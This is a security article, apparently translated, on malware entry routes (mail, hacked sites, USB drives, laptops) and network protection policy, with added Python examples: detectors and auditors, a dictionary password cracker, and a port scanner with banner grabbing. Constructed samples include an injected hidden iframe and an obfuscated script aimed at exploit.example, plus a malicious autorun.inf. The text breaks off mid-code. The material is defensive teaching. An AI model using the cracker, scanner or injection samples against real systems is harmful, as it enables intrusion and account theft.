  • if technically possible, block sending and receiving of e-mail with attached executable files and encrypted archives (an encrypted archive cannot be scanned by the mail antivirus, which is exactly why malware authors use them). At Smolenskenergo, for example, such blocking has been in place for a long time and has proved highly effective (blocked messages are quarantined and can be retrieved by the administrator);
  • set up content filters that block e-mail by keywords and keep them up to date. Such filters are effective against messages containing links to malware: these are usually easy to match on phrases like "Animated card" or "postcard". The side effect is that real greeting cards and similar messages are blocked too; a compromise is to run such a filter inside the anti-spam system and mark matching messages as spam rather than dropping them.
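As an added example (not code from the original article), here is the attachment part of such a gateway filter. It quarantines attachments with an executable extension, attachments whose content is a Windows PE file whatever the name claims, and ZIP archives whose entries carry the "encrypted" flag. The sample message, the extension list and the verdict strings are the author's assumptions.

```python
"""Mail-gateway attachment filter: executables (by extension or by content) and
password-protected ZIP archives are sent to quarantine.

Added example, not code from the original article. The sample message, the
extension list and the quarantine verdict strings are the author's assumptions.
"""
import io
import struct
import zipfile
from email import policy
from email.message import EmailMessage
from email.parser import BytesParser

EXEC_EXTENSIONS = {".exe", ".com", ".scr", ".pif", ".bat", ".cmd",
                   ".vbs", ".js", ".hta", ".msi"}
ZIP_LOCAL_HEADER = b"PK\x03\x04"


def zip_is_encrypted(data):
    """True if any local file header in the ZIP carries the 'encrypted' flag
    (bit 0 of the general-purpose flags). The headers are walked by hand
    because zipfile raises on deliberately malformed archives, and a filter
    must still reach a verdict on those. Entries written with a data
    descriptor (bit 3) have a zero size field and end the walk early."""
    offset = 0
    while data.startswith(ZIP_LOCAL_HEADER, offset):
        (flags,) = struct.unpack_from("<H", data, offset + 6)
        if flags & 0x0001:
            return True
        (compressed_size,) = struct.unpack_from("<I", data, offset + 18)
        name_len, extra_len = struct.unpack_from("<HH", data, offset + 26)
        offset += 30 + name_len + extra_len + compressed_size
    return False


def attachment_verdicts(raw_message):
    """Return [(filename, reason)] for every attachment the policy blocks."""
    msg = BytesParser(policy=policy.default).parsebytes(raw_message)
    verdicts = []
    for part in msg.iter_attachments():
        name = part.get_filename() or ""
        data = part.get_payload(decode=True) or b""
        ext = ("." + name.rsplit(".", 1)[-1].lower()) if "." in name else ""
        if ext in EXEC_EXTENSIONS:
            verdicts.append((name, "executable extension " + ext))
        elif data.startswith(b"MZ"):
            # Windows PE header regardless of what the name claims
            verdicts.append((name, "PE executable disguised as " + (ext or "no extension")))
        elif data.startswith(ZIP_LOCAL_HEADER) and zip_is_encrypted(data):
            verdicts.append((name, "password-protected archive"))
    return verdicts


def build_sample_zip(encrypted):
    """A one-entry ZIP built in memory. Python cannot write encrypted ZIPs, so
    the 'encrypted' variant sets flag bit 0 in the local header by hand."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_STORED) as zf:
        zf.writestr("card.exe", b"MZ" + b"\x00" * 62)
    data = bytearray(buf.getvalue())
    if encrypted:
        data[6] |= 0x01
    return bytes(data)


def build_sample_message():
    """Constructed 'greeting card' mail with four attachments: a double-extension
    executable, a PE renamed to .jpg, an encrypted ZIP and a harmless GIF."""
    msg = EmailMessage()
    msg["From"] = "cards@postcard.example"
    msg["To"] = "user@corp.example"
    msg["Subject"] = "Animated card for you"
    msg.set_content("Your card is attached.")
    pe = b"MZ" + b"\x00" * 62
    msg.add_attachment(pe, maintype="application", subtype="octet-stream",
                       filename="card.jpg.exe")
    msg.add_attachment(pe, maintype="image", subtype="jpeg", filename="card.jpg")
    msg.add_attachment(build_sample_zip(encrypted=True), maintype="application",
                       subtype="zip", filename="card.zip")
    msg.add_attachment(b"GIF89a" + b"\x00" * 10, maintype="image", subtype="gif",
                       filename="logo.gif")
    return msg.as_bytes()


if __name__ == "__main__":
    for name, reason in attachment_verdicts(build_sample_message()):
        print(f"quarantine {name}: {reason}")
```

The content check matters more than the extension list: a renamed executable passes any extension filter, while the MZ signature does not change. Quarantine rather than delete, as the text recommends, so that a legitimate installer or archive can still be released by the administrator.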

Internet

In terms of the number of investigated incidents, the Internet is also one of the main sources of malware penetration into the network. There are several main methods widely used by attackers:

  • all kinds of cracks and serial number generators. Statistics show that when a user searches for a key or crack on hacker sites, the probability of the computer being infected with malware is very high. The malicious program may be downloaded in the archive together with the crack, or picked up while browsing the site through exploits and malicious scripts hosted there. Countermeasures: block access to hacker sites at the proxy server and prohibit visiting them in the security policy and other governing documents of the company;
  • hacked legitimate sites. According to statistics, site compromises have recently become more frequent and follow standard patterns. A small piece of code is injected into the HTML of the compromised site's pages, usually an IFRAME tag leading to a page with an exploit, or an obfuscated script that redirects the user to the malicious site in one way or another (the script may dynamically insert the IFRAME into the page body, redirect to the exploit page, and so on). The main danger is that a site compromise cannot be predicted, and accordingly it is very hard to protect the user from it (Fig. 3).

Fig. 3. Exploit code added to the end of the HTML page of a hacked site

As the figure shows, the exploit code is appended to the end of the HTML page by automated means and is an obfuscated ("encrypted") script. The obfuscation hinders analysis, but its main purpose is to evade signature detection. In more complex cases the injected fragments are placed inside the page code, which makes them harder to spot.
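The following scanner is an added example (not code from the original article) of how the injection patterns just described can be flagged in a fetched page: IFRAMEs with zero size or hidden by style, scripts containing the usual unpacking calls or long runs of escaped bytes, and anything at all that appears after the closing </html>, which is where automated injection tools append their payload. The sample page, the host exploit.example and the thresholds are constructed assumptions.

```python
"""Scan an HTML page for the injection patterns described above: hidden IFRAMEs
and obfuscated scripts, especially ones appended after the closing </html>.

Added example, not code from the original article. The sample page, the host
"exploit.example" and the detection thresholds are constructed assumptions.
"""
import re
from html.parser import HTMLParser

OBFUSCATION_MARKERS = ("eval(", "unescape(", "String.fromCharCode", "document.write(")
# Eight or more consecutive %XX, \xXX or \uXXXX escapes: a packed payload.
ESCAPE_RUN = re.compile(r"(?:%[0-9a-fA-F]{2}|\\x[0-9a-fA-F]{2}|\\u[0-9a-fA-F]{4}){8,}")


def _is_hidden_size(value):
    """True for width/height of 0 or 1 px (the classic 'invisible' IFRAME)."""
    try:
        return float(value.strip().lower().removesuffix("px")) <= 1
    except ValueError:
        return False


class InjectionScanner(HTMLParser):
    """Collect (kind, what, reasons) findings while the page is parsed."""

    def __init__(self):
        super().__init__()
        self.findings = []
        self._after_html = False   # set once </html> has been seen
        self._script = None        # buffered <script> body, or None

    def _report(self, kind, what, reasons):
        if self._after_html:
            reasons = reasons + ["after </html>"]
        self.findings.append((kind, what, ", ".join(reasons)))

    def handle_starttag(self, tag, attrs):
        a = {k: (v or "") for k, v in attrs}
        if tag == "iframe":
            reasons = []
            if _is_hidden_size(a.get("width", "")) or _is_hidden_size(a.get("height", "")):
                reasons.append("zero-size")
            style = a.get("style", "").replace(" ", "").lower()
            if "display:none" in style or "visibility:hidden" in style:
                reasons.append("hidden by style")
            if reasons:
                self._report("iframe", a.get("src", ""), reasons)
        elif tag == "script":
            self._script = []

    def handle_data(self, data):
        if self._script is not None:
            self._script.append(data)

    def handle_endtag(self, tag):
        if tag == "script" and self._script is not None:
            body = "".join(self._script)
            self._script = None
            reasons = [m for m in OBFUSCATION_MARKERS if m in body]
            if ESCAPE_RUN.search(body):
                reasons.append("long escape sequence")
            if reasons:
                self._report("script", body[:40], reasons)
        elif tag == "html":
            self._after_html = True


def scan_page(html):
    """Return the list of findings for one page."""
    scanner = InjectionScanner()
    scanner.feed(html)
    scanner.close()
    return scanner.findings


# Constructed sample: a normal page with a benign script, then the injected tail.
SAMPLE_PAGE = """<html><head><title>Company news</title></head>
<body><p>Welcome to our site.</p>
<script>var year = 2008; document.title += " - " + year;</script>
</body></html>
<iframe src="http://exploit.example/in.php" width="0" height="0" style="display:none"></iframe>
<script>document.write(unescape("%3C%69%66%72%61%6D%65%20%73%72%63%3D%22%68%74%74%70%3A%2F%2F%65%78%70%6C%6F%69%74%2E%65%78%61%6D%70%6C%65%2F%22%3E"));</script>
"""

if __name__ == "__main__":
    for kind, what, reasons in scan_page(SAMPLE_PAGE):
        print(f"{kind}: {what!r} ({reasons})")
```

Such heuristics complement signatures rather than replace them: the markers are easy to rename, but an IFRAME that is both invisible and placed after </html> has no legitimate reason to exist, which is why the position check is the most robust of the three.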

Protection against exploits in web pages comes down to prompt installation of operating system and browser updates. In addition, running the browser with the lowest possible privileges gives good results: it can significantly reduce the damage if an exploit does fire.

Flash media

Such media are now in very wide use: flash drives and flash cards, hard drives with a USB interface, mobile phones, cameras, voice recorders. The spread of these devices leads to a growing number of malicious programs that use them as a means of transfer. There are three basic ways to infect a flash drive:

  • creating an autorun.inf file in the root of the drive to launch the malicious program, and placing the program anywhere on the drive (not necessarily in the root). autorun.inf on a flash drive works the same way as on a CD-ROM: when the drive is connected or opened in Explorer, the malicious program is launched;
  • creating, in the root of the drive or in folders already on it, executable files whose names and icons resemble existing files or folders. The author ran an experiment: a harmless executable with an icon visually indistinguishable from the folder icon and the name MP3 was placed on the flash drives of the participating users. The users immediately took an interest in the new "folder" and double-clicked it to see its contents, which launched the executable;
  • using the "companion virus" principle. In essence this method is the same as the previous one, but here the malicious program creates many copies of itself whose names match the names of files or folders on the flash drive, so that the user opens the copy instead of the original.
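As an added example (not code from the original article), the script below audits a removable drive for the first and third patterns: it parses autorun.inf for any directive that launches a program, and looks for executables that shadow an existing file or folder of the same name (which is also what the folder-icon trick becomes once the executable is named after a folder; the icon itself sits in the PE resources and is not examined here). The sample drive is a throw-away directory constructed to look infected.

```python
"""Audit a removable drive for the infection patterns described above: launch
directives in autorun.inf and executables that shadow an existing file or
folder (the "companion" trick).

Added example, not code from the original article. The sample drive is a
throw-away directory constructed to look infected; the file names in it are
the author's assumptions.
"""
import tempfile
from pathlib import Path

EXEC_SUFFIXES = {".exe", ".scr", ".com", ".pif", ".bat", ".cmd", ".vbs"}
LAUNCH_KEYS = ("open", "shellexecute")


def parse_autorun(text):
    """Return [(key, value)] for every directive in [autorun] that launches
    something. A hand-written parser is used rather than configparser because
    malware autorun.inf files are often deliberately malformed (junk lines,
    duplicated keys, odd casing) to trip up scanners."""
    launches = []
    in_autorun = False
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith((";", "#")):
            continue
        if line.startswith("[") and line.endswith("]"):
            in_autorun = line[1:-1].strip().lower() == "autorun"
            continue
        if not in_autorun or "=" not in line:
            continue
        key, value = (s.strip() for s in line.split("=", 1))
        key = key.lower()
        if key in LAUNCH_KEYS or (key.startswith("shell\\") and key.endswith("\\command")):
            launches.append((key, value))
    return launches


def audit_drive(root):
    """Return sorted [(kind, detail)] findings for the drive mounted at root."""
    root = Path(root)
    findings = []
    autorun = root / "autorun.inf"
    if autorun.is_file():
        for key, value in parse_autorun(autorun.read_text(errors="replace")):
            findings.append(("autorun", f"{key}={value}"))
    for path in root.rglob("*"):
        if not path.is_file() or path.suffix.lower() not in EXEC_SUFFIXES:
            continue
        twin = path.with_suffix("")   # "Photos.exe" -> "Photos", "report.doc.exe" -> "report.doc"
        if twin.exists():
            findings.append(("companion", f"{path.relative_to(root)} shadows {twin.relative_to(root)}"))
    return sorted(findings)


def build_sample_drive():
    """Constructed infected drive in a temporary directory; returns its path."""
    root = Path(tempfile.mkdtemp(prefix="usb-"))
    (root / "autorun.inf").write_text(
        "[AutoRun]\r\n"
        ";random junk line\r\n"
        "OPEN=RECYCLER\\svchost.exe\r\n"
        "shell\\open\\command=RECYCLER\\svchost.exe\r\n"
        "icon=%SystemRoot%\\system32\\shell32.dll,4\r\n")
    (root / "RECYCLER").mkdir()
    (root / "RECYCLER" / "svchost.exe").write_bytes(b"MZ")
    (root / "Photos").mkdir()
    (root / "Photos.exe").write_bytes(b"MZ")        # companion of the Photos folder
    (root / "report.doc").write_bytes(b"\xd0\xcf\x11\xe0")
    (root / "report.doc.exe").write_bytes(b"MZ")    # companion of report.doc
    (root / "readme.txt").write_text("clean file")
    return root


if __name__ == "__main__":
    for kind, detail in audit_drive(build_sample_drive()):
        print(f"{kind}: {detail}")
```

The shell\...\command form is included because it is what Explorer runs when the user picks "Open" from the drive's context menu, so a file that sets it is just as dangerous as one that sets open= even on a machine where AutoPlay is disabled.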

The techniques for protecting against malware spread via flash media are quite simple:

  • install anti-virus protection on users' computers with a monitor that checks files in real time;
  • disable autorun, which is an effective measure on its own;
  • on critical PCs, block the use of flash media altogether. Blocking can be done physically (disabling the USB ports and sealing them) or logically, with special software;
  • write local security policies that block the launch of applications from a flash drive.

Notebooks and PDAs

Mobile computers are another malware vector. A typical situation is a laptop taken on a business trip and connected to someone else's network. During that work the laptop may become infected, most often by a network worm, and when it is then connected to its "home" network the PCs on that network can be infected from it. This is difficult to protect against; the set of measures comes down to the following:

  • install an antivirus and a firewall on the laptop, with mandatory periodic checks by the administrator that they are working;
  • check the laptop before connecting it to the network, although this is not always technically possible, takes a lot of time and money, and reduces user mobility;
  • create a separate "guest" subnet for laptops and take measures to protect the main LAN from that subnet.

Conclusions

This article reviewed the most common ways malware penetrates a network. Two important conclusions follow from the above:

  • most of the methods described involve the human factor in one way or another, so staff training and periodic security briefings will raise the security of the network;
  • the recent increase in compromises of legitimate sites means that even a competent user can infect his computer. Consequently, classical protection measures come to the fore: anti-virus software, timely installation of updates, and tools for monitoring Internet traffic.

3. Means of protecting computer networks

Means of protecting computer networks: nomenclature, status, interconnection

According to experts, a protection policy should address at least the following aspects:

  • authorization of access to computer systems, identification and authentication of the user;
  • access rights control;
  • protection monitoring and statistics analysis;
  • configuring and testing systems;
  • security training;
  • physical security;
  • network security.

The first of these points is the outpost: here the criteria are formulated that let only users with the right to connect reach the system, so that everyone else does not even get the chance to attempt a login. The standard tool for this is special files or lists of hosts from which remote login is allowed. The developers of such mechanisms, however, always leave a temptation for administrators: for some reason there is always a "button" that opens the entrance to everyone. There may be reasons for switching the control off in particular cases (the usual ones are the reliability of other measures or the absence of direct entry points), but it is hard to foresee every situation that can arise on a network. Access authorization should therefore still be configured explicitly rather than left at the default settings.
As practice shows, this kind of protection is not able to significantly reduce the likelihood of penetration. Its real value, and its central role, is different: it registers and accounts for the network users who try to log in.

The central role in modern security systems is assigned to the identification and authentication procedures. There are three basic ways to implement them:

  • using a password or passphrase known to the user;
  • using a personal device or document that only the user possesses: a smart card, a pocket authenticator, or simply a specially made identity card (the assumption being that the authenticator is never handed to anyone else);
  • by authenticating the user himself: by fingerprints, voice, retinal pattern, and so on. These identification methods are developed within the field of biometrics.

The most reliable authentication schemes are built as a combination of these methods, but the first, the character password, remains the most widespread. Not surprisingly, crackers are well armed with means of extracting logins and passwords. If they manage to copy the password file to their own machine, a brute-force program is run against it, usually as a large dictionary search. Such programs work quickly even on weak computers, and if the security system exercises no control over how passwords are formed there is a high probability of guessing at least one. This is followed by an attempt to obtain privileged rights from the account whose password was recovered, and the job is done.
Particularly dangerous, and not only to themselves, are machines with protection mechanisms disabled or absent altogether. Administrators have the means to establish trust relationships between hosts through files such as hosts.equiv and the xhost access list. With a bad configuration an intruder can enter an unprotected machine and, without any identification, transitively gain access to all hosts on the corporate network.


The next point of the security policy is access control, which ensures that after successful authentication only a subset of the system's files and services, defined for that user personally, becomes available. Thanks to this mechanism users can read, for example, only their own e-mail and not a neighbour's. Usually access rights are set by the users themselves: the owner of the data can allow someone else to work with it, just as the system administrator controls access rights to system and configuration files. What matters is that the owner always bears personal responsibility for his property.
Differentiation of rights is not limited to data: in parallel, users are assigned subsets of permitted operations. Take an automated ticket-sales system. The cashier must of course be able to connect to the central database to query availability and record sales, but his rights should be limited so that he cannot change the organization's settlement accounts or raise his own salary.
Typically, in multi-user applications differentiation is implemented through discretionary access control (DAC), and in operating systems through file attributes and the process identifiers EUID and EGID. The coherent picture is broken by the SUID and SGID bits, which allow a program to change the effective rights of the process that runs it. Setuid scripts, and especially setuid-root ones, are a potential security risk: either they should not be created at all, or they must themselves be reliably protected.
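The following script is an added example (not code from the original article) of the audit implied by the last paragraph: it walks a directory tree and reports every setuid or setgid file, singling out setuid-root binaries, interpreted scripts that carry the bit, and privileged files that are also world-writable. The sample tree is constructed in a temporary directory; on a real system you would run it over "/" as root, or feed it the output of "find / -perm /6000" for speed.

```python
"""Find setuid/setgid programs on a filesystem tree, singling out setuid-root
binaries and setuid scripts, which the text above says should not exist at all.

Added example, not code from the original article. The sample tree is built in
a temporary directory with the bits set by chmod.
"""
import os
import stat
import tempfile


def classify(mode, uid, head):
    """Concerns for one regular file, from its mode bits, owner uid and the
    first two bytes of content. Empty list means nothing to report."""
    concerns = []
    if not stat.S_ISREG(mode):
        return concerns
    setuid = bool(mode & stat.S_ISUID)
    setgid = bool(mode & stat.S_ISGID)
    if not (setuid or setgid):
        return concerns
    if setuid:
        concerns.append("setuid root" if uid == 0 else f"setuid uid={uid}")
    if setgid:
        concerns.append("setgid")
    if head.startswith(b"#!"):
        # Linux ignores the bit on scripts, but its presence still shows that
        # someone intended the interpreter to run with elevated ids.
        concerns.append("interpreted script with setuid/setgid bit")
    if mode & stat.S_IWOTH:
        concerns.append("world-writable")   # anyone can replace the privileged code
    return concerns


def find_privileged(root):
    """Walk root and return sorted [(path, concerns)] for files with concerns."""
    findings = []
    for dirpath, _dirs, filenames in os.walk(root):
        for name in filenames:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)          # lstat: do not follow symlinks
                if not stat.S_ISREG(st.st_mode):
                    continue
                with open(path, "rb") as f:
                    head = f.read(2)
            except OSError:
                continue
            concerns = classify(st.st_mode, st.st_uid, head)
            if concerns:
                findings.append((path, concerns))
    return sorted(findings)


def build_sample_tree():
    """Constructed tree: a setuid binary, a setuid shell script and a normal
    binary. Returns {name: path} plus the tree root under "root". A non-root
    user may set the setuid bit on files it owns, so no privileges are needed."""
    root = tempfile.mkdtemp(prefix="suid-")
    os.makedirs(os.path.join(root, "bin"))
    paths = {"root": root}
    for name, content, mode in (
        ("helper", b"\x7fELF", 0o4755),
        ("backup.sh", b"#!/bin/sh\nexit 0\n", 0o4755),
        ("normal", b"\x7fELF", 0o755),
    ):
        path = os.path.join(root, "bin", name)
        with open(path, "wb") as f:
            f.write(content)
        os.chmod(path, mode)
        paths[name] = path
    return paths


def has_setuid_bit(path):
    """True if the filesystem actually kept the setuid bit on path."""
    return bool(os.stat(path).st_mode & stat.S_ISUID)


if __name__ == "__main__":
    sample = build_sample_tree()
    for path, concerns in find_privileged(sample["root"]):
        print(path, "->", ", ".join(concerns))
```

Compare the list against the packages that legitimately ship setuid binaries (passwd, su, sudo and a handful of others); anything outside that set, and any script at all, is a candidate for removal or for replacing the bit with a narrowly scoped sudo rule.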
Security is impossible without maintaining order across the whole, often disorganized, infrastructure of the enterprise. Configuration management is the set of technologies that track the state of software, hardware, users and networks. Usually the configuration of a computer system and its components is clearly defined at the time of commissioning, but over time control is progressively lost. Configuration management tools exist to formalize and record every change that occurs in the system.
With good management, first, a strict procedure for making changes, including documenting them, must be thought out and defined. Second, every change must be evaluated against the overall security policy. The policy itself may be adjusted, but at every turn of the life cycle the decisions must be kept consistent for everything on the network, including outdated systems that remain in service; otherwise they turn into the proverbial "weak link".
All the above aspects of protection rest in one way or another on software technologies, but there are extremely important issues outside that circle. The corporate network includes the real world: users, physical devices, storage media and so on, which can also cause trouble. Our users, apparently by historical tradition, are ironic about matters of secrecy. In a networked environment this attitude urgently needs to change so that the basic principles of protection are understood. That is the first stage; after it comes the next, technical training, which not only users but professionals should go through. As the security policy is specified, system and database administrators should be familiar with it to the extent needed to translate it into specific software settings.
A typical loophole for hackers is "weak", that is, easily cracked, passwords. The situation can be corrected by teaching users to treat access control consciously: change passwords periodically and form them properly. Surprisingly, even in a qualified environment a common trap is a password formed from the login with a 1 appended. Although the weight of physical security declines as technology advances, it still forms an important part of overall policy. If an intruder can reach the physical components of the network, he can usually log in without authorization. Moreover, users' ability to physically reach critical system components raises the likelihood of unintentional service disruption. Hence direct contact with vital computer and network equipment should be limited to the smallest possible circle of personnel, the system administrators and engineers. This implies no exceptional trust in them; it simply reduces the probability of incidents, and if something does happen, the diagnosis becomes more certain. From my own experience I can confirm the usefulness of simple organizational measures: do not put valuable equipment where anyone can walk past it.
Hoping for the best, it is wise to plan for the bad options too. It does not hurt to have a contingency plan for a power failure or other catastrophe, including a malicious intrusion. If a break-in does occur, you need to be ready to react very quickly, before the attackers have time to do severe damage to the system or change the administrative passwords.
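The dictionary attack against a copied password file described in the authentication section, and the "login plus 1" trap just mentioned, are shown together in the following added example (not code from the original article). It runs a small word list with common mangling rules against a constructed password file and then applies the set-time policy check that would have rejected every password it recovers. Salted SHA-256 is an assumption standing in for whatever hash the real system uses.

```python
"""Dictionary attack with simple mangling rules against a copied password file,
plus the set-time policy check that would have kept those passwords out.

Added example, not code from the original article. The password file, the word
list and the hash scheme are constructed; salted SHA-256 stands in for whatever
the real system uses (and is itself an example of a fast hash that makes this
attack cheap).
"""
import hashlib

WORDLIST = ["password", "qwerty", "letmein", "summer", "welcome"]

# Constructed password file, one "login:salt:hexdigest" per line.
PASSWORD_FILE_TEMPLATE = "alice:x7Q2:{a}\nbob:9zLp:{b}\ncarol:Ff01:{c}\ndave:Tt8u:{d}\n"


def hash_password(password, salt):
    return hashlib.sha256((salt + password).encode()).hexdigest()


def sample_password_file():
    """Built here so the digests are correct by construction."""
    return PASSWORD_FILE_TEMPLATE.format(
        a=hash_password("Summer7", "x7Q2"),            # dictionary word, capitalised, digit appended
        b=hash_password("bob1", "9zLp"),               # login plus a trailing 1
        c=hash_password("password", "Ff01"),           # dictionary word verbatim
        d=hash_password("Tr0ub4dor&Pelican", "Tt8u"),  # not derivable from the rules below
    )


def mangle(word):
    """The handful of rules that account for most real-world dictionary hits."""
    for base in (word, word.capitalize()):
        yield base
        for digit in "0123456789":
            yield base + digit


def candidates(login, wordlist):
    """Login-derived guesses first (cheapest, surprisingly effective), then the
    mangled dictionary."""
    yield login
    yield login + "1"
    yield login + "123"
    for word in wordlist:
        yield from mangle(word)


def crack(password_file, wordlist):
    """Return {login: password} for every account a candidate matched."""
    cracked = {}
    for line in password_file.splitlines():
        login, salt, digest = line.split(":")
        for guess in candidates(login, wordlist):
            if hash_password(guess, salt) == digest:
                cracked[login] = guess
                break
    return cracked


def acceptable(login, password, wordlist):
    """Policy applied when a password is set: reject what crack() would find."""
    if len(password) < 10:
        return False
    lowered = password.lower()
    if login.lower() in lowered:
        return False
    return not any(word in lowered for word in wordlist)


if __name__ == "__main__":
    for login, password in crack(sample_password_file(), WORDLIST).items():
        print(f"{login}: {password}")
```

Two points the run makes concrete: the login-derived guesses cost three hashes per account and still succeed, and a fast hash lets a weak machine try the whole candidate set in milliseconds. A deliberately slow, salted scheme (bcrypt, scrypt or Argon2) raises the per-guess cost, but only the policy check stops the "login plus 1" habit.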
Network security issues, in the overall context of a security policy, should cover the different kinds of access:

Accordingly, two types of mechanisms are used: internal ones and those on the perimeter of the enterprise network, where external connections terminate.
For internal network security it is important to ensure correct configuration of hardware and software by establishing configuration management. External network security involves defining clear network boundaries and installing firewalls at the critical points.

Security risk assessment

Once the protection policy has been implemented you could take a break, but it is better not to wait for the hackers to arrive and instead see for yourself how well your system withstands external attacks. The goal is to evaluate the degree of security actually achieved and identify the strong and weak points of the protection. The assessment can be done in-house, although it may be easier to use a company that specializes in this work. In-house specialists face an additional difficulty: they have to ask awkward questions of their colleagues and draw conclusions that someone may find unpleasant.

Security Policy Evaluation and Testing
The first step is to compare what is planned in the security policy with what is actually happening. To do this, you need to find answers to approximately the following questions.

  • Who determines what is confidential?
  • Are there procedures for dealing with confidential information?
  • Who determines the composition of confidential information communicated to personnel in order to perform work functions?
  • Who administers the security system and on what basis?

Obtaining such information is not always easy. The best option is to collect and read the published formal documents containing security policy statements, business procedures, architecture diagrams and so on. However, most organizations have no such documents at all, and where they exist they are largely ignored. Then, to reveal the real state of affairs, you will have to observe workplaces in the field, determining at the same time whether any manifestations of a single policy can be noticed at all.
The gap between written rules and actual staff practice can be very wide. For example, a published policy may state that a password must never be used by more than one employee. There are no doubt many organizations where this is scrupulously observed, but even more suffer precisely from password sharing.
Some weaknesses of corporate culture can only be discovered by covert reconnaissance. For example, corporate policy may state that passwords are secret and must not be written down anywhere, while a quick walk around the premises shows them stuck directly on the keyboard or monitor. Another effective technique is to interview users about the rules for handling information. Such interviews reveal which information is most valuable to an employee and how it is represented inside the corporate network and outside it.

Studying open sources
Knowledge is power. Following this motto, an attacker can extract a fair amount of a company's effectively private internal information by digging through its open, publicly available materials. The second step of the security assessment is to find out how much an outsider can learn about the company. "Useful" information that helps penetration includes: the types of operating systems in use, the patches installed, the naming convention for user logins, internal IP addresses, and the names of private hosts and servers.
Steps can (and should) be taken to reduce the amount of information that hackers and crackers can collect, but this requires knowing what has already leaked and understanding how the leak happened. Material published by employees on the Internet deserves the closest attention. There is a known case of a company presenting a fragment of the source code of a security-critical application on its web page. Similar problems can be found in material placed in newspapers, magazines and other sources.
The results of studying the open material should become the basis for adjusting the rules for preparing open publications.

Host System Security Assessment
Central processing systems (host systems) are usually the best off in terms of security, for a simple reason: host systems are more mature, and their operating systems and security software are better developed and better understood. Some of the most popular mainframe and midrange security products are decades old.
This does not, of course, mean that your host system is secure a priori. The old host may be the weakest link, for instance if it was built in "prehistoric" times when nobody thought about either local or global networks. The security scheme and its implementation on the host must be evaluated from a new perspective, to determine how well the application software, the operating system's security mechanisms and the network work together. Since at least two groups of specialists are involved in running the system, one for the operating system and one for the applications, each of them may well leave the security concerns to the other, and the net result may be zero.

Server Security Analysis
Unlike host systems, file, application and database servers are younger and comparatively less tested: for many of them the protection apparatus is only a few years old. Most of these tools are in constant flux, with updates and patches. Server administration is often done by specialists with little experience, so the security of this class of systems usually leaves much to be desired. The situation is aggravated by the fact that, by definition, a very mixed public has access to the servers over telephone or remote communication lines. Server security assessment therefore requires increased attention. A number of tools are available for this, including Kane Analyst (for Novell and NT). Products of this type inspect the servers (using privileged access) and report on configuration, security administration practices and the user population. Automated tools are worth using: a single scan can reveal problems that many hours of manual analysis would be unlikely to find. For example, a scan can quickly show the percentage of users who have excessive access levels or who are members of too many groups.
The next sections discuss two more stages: the analysis of the security of network connections.

Simulated controlled penetration
Apparently one of the best ways to check security is to hire a qualified hacker and ask him to demonstrate what he can achieve on your network. This type of assessment is called controlled penetration testing.
When preparing such a test it does no harm to agree on restrictions on the scope of the attack and its type: after all, this is only a check, and it must in no case disrupt normal operation. Based on the agreed "rules of engagement", the types of test are then chosen.
There are two approaches. In the first, testing is done as a real cracker would do it. This approach is called blind penetration. Its distinguishing feature is that the tester is told, for example, a URL, but inside information such as additional Internet access points or direct connections to the network is not disclosed.
In the second approach, "informed penetration", the attack team has some knowledge of the network structure before the attack. This approach is adopted when it must be verified that specific components pass the test. For example, when a firewall is installed, the rule set it uses must be tested separately.
The set of tests can be divided into two groups: penetration from the Internet and penetration over telephone lines.

Internet Connection Scanning
Usually the main hopes for protection are placed on the firewalls between the internal corporate network and the Internet. Be aware, however, that a firewall is only as good as its installation: it must be placed at the right point and run on a reliable operating system. Otherwise it is simply a source of a false sense of security.
To check firewalls and similar systems, scanning and penetration tests are run that simulate an attack on the system under test from the Internet. There are many software tools for this, two popular ones being ISS Scanner (a commercial product) and SATAN (freeware; note that it has not been updated since 1995). Whichever scanner you choose, the tests only make sense if three conditions are met: you must learn to operate the scanner correctly, the scan results must be analysed carefully, and as much of the infrastructure as possible must be scanned.
The main "targets" of this group of tests are the publicly reachable Internet service servers (WWW, SMTP, FTP and so on). Reaching these servers is easy: their names are known and access is open. The cracker then tries to get at the data of interest. There are several known attack techniques that can be tried directly against the server. Also, starting from the server's IP address, a scan can be launched to identify other hosts in the same address range. If anything is found, a port sweep is run on each responding IP address to determine the services running on the host. In many cases, an attempt to connect to or use a service reveals information such as the server platform, the operating system version and even the service version (for example, sendmail 8.6).
Armed with this information, an attacker can launch a series of attacks against known vulnerabilities of the host. Experience shows that in most situations, with enough ingenuity, it is possible to obtain some level of unauthorized access.
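The port sweep and version leak described above, as an added example (not code from the original article): a TCP connect scan that grabs each open service's banner and matches it against a few version patterns. To stay offline and legal, the target is a fake SMTP listener started in-process on 127.0.0.1 that answers with a "Sendmail 8.6" greeting; the banner patterns, the fake service and the host name mail.example are constructed assumptions.

```python
"""TCP connect scan with banner grabbing and version identification, run
against a fake SMTP listener started in-process on 127.0.0.1 so the example
works offline and touches nothing you are not authorised to scan.

Added example, not code from the original article. The banner patterns, the
fake service and the host name "mail.example" are constructed assumptions;
the "Sendmail 8.6" string mirrors the version leak described above.
"""
import re
import socket
import threading

# (pattern, product) pairs; group 1 is the version string.
BANNER_PATTERNS = [
    (re.compile(r"ESMTP Sendmail ([\d.]+)", re.I), "sendmail"),
    (re.compile(r"^SSH-2\.0-OpenSSH_([\w.]+)"), "openssh"),
    (re.compile(r"^220.*\(vsFTPd ([\d.]+)\)", re.I), "vsftpd"),
]


def identify(banner):
    """(product, version) from a banner, or ("unknown", "")."""
    for pattern, product in BANNER_PATTERNS:
        match = pattern.search(banner)
        if match:
            return product, match.group(1)
    return "unknown", ""


def grab_banner(host, port, timeout=0.5):
    """Banner text if the port accepts a connection ('' if the service is silent),
    None if the connection is refused or times out."""
    try:
        with socket.create_connection((host, port), timeout=timeout) as sock:
            sock.settimeout(timeout)
            try:
                return sock.recv(256).decode(errors="replace").strip()
            except socket.timeout:
                return ""
    except OSError:
        return None


def scan(host, ports):
    """[(port, banner, product, version)] for every open port in ports."""
    results = []
    for port in ports:
        banner = grab_banner(host, port)
        if banner is None:
            continue
        product, version = identify(banner)
        results.append((port, banner, product, version))
    return results


def start_fake_smtp(banner=b"220 mail.example ESMTP Sendmail 8.6/8.6; ready\r\n"):
    """Start a daemon thread that answers every connection on an ephemeral
    localhost port with the given banner; returns the port number."""
    server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    server.bind(("127.0.0.1", 0))
    server.listen(5)

    def serve():
        while True:
            try:
                conn, _addr = server.accept()
            except OSError:
                return
            with conn:
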